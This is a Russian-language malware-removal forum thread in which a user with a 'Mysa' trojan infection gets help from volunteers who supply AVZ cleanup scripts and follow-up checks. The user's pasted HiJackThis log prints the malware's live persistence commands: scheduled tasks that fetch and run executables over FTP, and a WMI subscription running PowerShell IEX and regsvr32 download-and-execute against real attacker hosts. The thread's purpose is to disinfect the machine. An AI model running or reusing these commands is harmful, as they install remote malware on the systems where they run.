Решена Троян mysa 1,2,3 + ok

Статус
В этой теме нельзя размещать новые ответы.

qvaqsha

Новый пользователь
Сообщения
21
Реакции
1
Пробовал удалить через drweb cureit
потом чистил hijack пункты:
O17 - DHCP DNS 1: 10.100.100.100
O17 - HKLM\System\CCS\Services\Tcpip\..\{65A2DA80-8006-4A90-B603-FA6956DA627D}: [NameServer] = 10.100.100.100
O22 - Task: Mysa - C:\Windows\system32\cmd.exe /c echo open ftp.ftp1202.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe
O22 - Task: Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
O22 - Task: Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp1202.site>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
O22 - Task: Mysa3 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp1202.site>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe
O22 - Task: ok - C:\Windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
O22 - Task: oka - C:\Windows\system32\cmd.exe /c start c:\windows\inf\aspnet\lsma12.exe
O25 - WMI Event: fuckamm4 - fuckamm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'", cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://192.236.160.237:8237/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://144.208.127.215:8215/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.161:8161/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.162:8162/power.txt')||regsvr32 /u /s /i:http://144.208.127.215:8215/s.txt scrobj.dll&regsvr32 /u /s /i:http://103.106.250.161:8161/s.txt scrobj.dll&regsvr32 /u /s /i:http://172.83.155.170:8170/s.txt scrobj.dll&regsvr32 /u /s /i:http://192.236.160.237:8237/s.txt scrobj.dll&regsvr32 /u /s /i:http://103.106.250.162:8162/s.txt scrobj.dll&regsvr32 /u /s /i:http://wmi.1103bye.xyz:8080/s.txt scrobj.dll&wmic os get /FORMAT:"http://172.83.155.170:8170/s.xsl"
Удалял сами файлы по путям, вирус всё равно восстанавливается.
 

Вложения

  • HiJackThis.log
    16.1 KB · Просмотры: 1
Логи
 

Вложения

  • CollectionLog-2019.12.16-13.37.zip
    35.3 KB · Просмотры: 3
Пролечите систему с помощью KVRT. После этого папку C:\KVRT\Reports упакуйте в архив и прикрепите к следующему сообщению.
Соберите и прикрепите свежий CollectionLog Автологером.
 
Пролечите систему с помощью KVRT. После этого папку C:\KVRT\Reports упакуйте в архив и прикрепите к следующему сообщению.
Соберите и прикрепите свежий CollectionLog Автологером.
Я Вас опередил, предыдущий лог Автологера, сделан уже после лечения KVRT.
Лог с KVRT прикрепил.
 

Вложения

  • Reports.rar
    1.2 KB · Просмотры: 1
Тогда посмотрим на состояние после скрипта
Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ из папки Autologger (Файл - Выполнить скрипт):
Код:
  begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
 QuarantineFile('c:\windows\inf\aspnet\lsma12.exe', '');
 QuarantineFile('C:\WINDOWS\mssecsvc.exe', '');
 QuarantineFile('C:\Windows\tasksche.exe', '');
 DeleteFile('c:\windows\inf\aspnet\lsma12.exe', '64');
 DeleteFile('C:\WINDOWS\mssecsvc.exe', '64');
 DeleteFile('C:\WINDOWS\mssecsvr.exe', '64');
 DeleteFile('C:\Windows\tasksche.exe', '32');
 DeleteService('mssecsvc2.0');
 DeleteService('mssecsvc2.1');
 DeleteSchedulerTask('oka');
BC_ImportALL;
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
BC_Activate;
RebootWindows(true);
end.
Компьютер перезагрузится.

После перезагрузки, выполните такой скрипт:

Код:
begin
DeleteFile(GetAVZDirectory+'quarantine.7z');
ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine .\Quarantine\*', 1, 300000, false);
end.

Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 10 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: malware в теле письма.

"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):
Код:
O4-32 - HKLM\..\RunOnce: [{6E23A13F-30F6-4C3F-BE45-2DEE1967F47A}] = C:\Users\Администратор\AppData\Local\Temp\{008ADB5C-D747-41DE-A454-38EAD161AA4B}\{6E23A13F-30F6-4C3F-BE45-2DEE1967F47A}.cmd

Для повторной диагностики запустите снова AutoLogger. В первом диалоговом окне нажмите "ОК", удерживая нажатой клавишу "Shift".
 

Вложения

  • CollectionLog-2019.12.17-16.28.zip
    41.5 KB · Просмотры: 1
Проблема решена?
 
Завершаем:
  • Загрузите SecurityCheck by glax24 & Severnyj, сохраните утилиту на Рабочем столе и извлеките из архива.
  • Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10)
  • Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
  • Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
  • Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
  • Прикрепите этот файл к своему следующему сообщению.
 
------------------------------- [ Windows ] -------------------------------
Internet Explorer 11.0.9600.17843 Внимание! Скачать обновления
^Онлайн установка. Последняя версия доступна при включенном обновлении Windows через интернет.^
Автоматическое обновление отключено (-1)
------------------------------- [ HotFix ] --------------------------------
HotFix KB3177467 Внимание! Скачать обновления
HotFix KB3125574 Внимание! Скачать обновления
HotFix KB4012212 Внимание! Скачать обновления
HotFix KB4499175 Внимание! Скачать обновления
HotFix KB4474419 Внимание! Скачать обновления
HotFix KB4490628 Внимание! Скачать обновления
HotFix KB4512486 Внимание! Скачать обновления
HotFix KB4530734 Внимание! Скачать обновления
--------------------------- [ OtherUtilities ] ----------------------------
OpenOffice 4.1.3 v.4.13.9783 Внимание! Скачать обновления
-------------------------------- [ Arch ] ---------------------------------
WinRAR 4.20 (64-разрядная) v.4.20.0 Внимание! Скачать обновления
--------------------------------- [ SPY ] ---------------------------------
Radmin Server 3.5 v.3.50.0000 Внимание! Программа удаленного доступа!

Читайте Рекомендации после удаления вредоносного ПО
 
  • Like
Реакции: akok
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху Снизу